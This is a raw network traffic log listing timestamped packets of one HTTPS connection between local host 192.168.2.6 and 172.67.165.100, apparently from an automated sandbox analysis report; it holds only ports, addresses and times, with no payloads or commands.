Dec 29, 2024 04:24:22.630187035 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.634449005 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.634500980 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.634509087 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.634553909 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.636574984 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.636627913 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.646197081 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.646262884 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.655220032 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.655276060 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.660125017 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.660187006 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.664829969 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.664882898 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.670191050 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.670253038 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.679610968 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.679677010 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.689182043 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.689244032 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.694112062 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.694175005 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.703726053 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.703802109 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.713177919 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.713243961 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.718010902 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.718069077 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.722729921 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.722796917 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.727715015 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.727770090 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.827919006 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.827997923 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.828008890 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.828062057 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.851336956 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.851418018 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.858120918 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.858190060 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.861648083 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.861710072 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.868351936 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.868422031 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.874926090 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.874975920 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.881628036 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.881755114 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.881761074 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.881903887 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.885065079 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.885117054 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.888420105 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.888472080 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.895128965 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.895181894 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.898485899 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.898549080 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.905075073 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.905134916 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.911710024 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.911777973 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.915082932 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.915139914 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.921761036 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.921825886 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.925237894 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.925297022 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.928441048 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.928491116 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.931823015 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.931888103 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.935255051 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.935307026 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.941886902 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.941961050 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.969110012 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.969186068 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.970859051 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.970922947 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.977498055 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.977556944 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.980911016 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.980973005 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.987523079 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.987584114 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.052158117 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.052169085 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.052263975 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.057308912 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.057369947 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.090631962 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.090653896 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.090743065 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.090753078 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.090841055 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.101811886 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.101829052 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.101881981 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.101888895 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.101938963 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.101938963 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.111223936 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.111238956 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.111387968 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.111393929 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.111588955 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.119360924 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.119375944 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.119508028 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.119512081 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.119642019 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.129390001 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.129403114 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.129483938 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.129488945 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.129533052 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.129544973 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.136105061 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.136154890 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.136183023 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.136188030 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.136219025 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.136264086 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.142817020 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.142854929 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.142889023 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.142893076 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.142921925 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.142960072 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.148179054 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.148216009 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.148242950 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.148273945 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.148273945 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.148279905 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.148308992 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.148339033 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.255134106 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.255273104 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.257559061 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.257661104 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.258585930 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.258838892 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.291304111 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.291347980 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.291382074 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.291392088 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.291426897 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.291457891 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.294572115 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.294668913 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.294675112 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.294836998 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.296525002 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.296756983 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.297700882 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.297775030 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.300823927 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.300918102 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.300928116 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.301011086 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.301812887 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.301939964 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.306075096 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.306107998 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.306181908 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.306181908 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.306188107 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.306289911 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.311228037 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.311263084 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.311336994 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.311336994 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.311346054 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.311527014 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.314436913 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.314506054 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.316471100 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.316550970 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.316622972 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.316735983 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.317678928 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.317787886 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.324990034 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.325007915 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.325089931 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.325089931 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.325097084 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.325305939 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.331840992 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.331856012 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.331999063 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.332005024 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.332228899 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.332915068 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.333023071 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.454547882 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.454566956 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.454833984 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.454842091 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.455064058 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.490089893 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.490103960 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.490302086 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.490308046 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.490417957 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.495976925 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.495990992 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.496134043 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.496139050 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.496356010 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.500108004 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.500241041 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.500246048 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.500478983 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.501040936 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.501169920 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.505250931 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.505301952 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.505372047 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.505377054 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.505610943 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.510509968 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.510550022 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.510581970 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.510587931 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.510617971 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.510700941 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.514816999 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.514853954 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.514884949 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.514889956 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.514914989 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.515326023 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.520070076 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.520104885 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.520137072 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.520140886 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.520169020 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.520464897 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.527338982 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.527354956 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.527448893 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.527448893 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.527456045 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.527585983 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.529898882 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.529997110 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.536322117 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.536355972 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.536478996 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.536484957 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.536658049 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.660567045 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.660581112 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.660693884 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.660693884 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.660703897 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.660840988 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.696180105 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.696193933 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.696307898 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.696307898 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.696315050 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.699635983 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.702570915 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.702583075 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.702670097 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.702670097 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.702675104 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.702796936 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.710506916 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.710557938 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.710597038 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.710601091 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.710629940 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.710685968 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.717122078 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.717137098 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.717360973 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.717365980 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.717433929 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.723561049 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.723578930 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.723659039 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.723659039 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.723664045 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.723731041 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.731296062 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.731307983 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.731651068 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.731656075 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.732902050 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.737773895 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.737786055 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.737904072 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.737904072 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.737910032 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.738073111 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.860719919 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.860764027 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.860852003 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.860852003 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.860860109 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.861097097 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.896503925 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.896519899 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.896634102 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.896634102 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.896640062 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.896738052 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.903774023 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.903786898 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.903881073 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.903881073 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.903887033 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.904511929 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.909126997 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.909172058 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.909212112 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.909214973 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.909245014 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.909847975 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.916430950 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.916444063 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.916527987 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.916527987 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.916532993 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.916584969 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.921655893 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.921694040 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.921730042 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.921734095 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.921762943 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.922456026 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:23.929043055 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.929056883 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:23.929141045 CET	49722	443	192.168.2.6	172.67.165.100
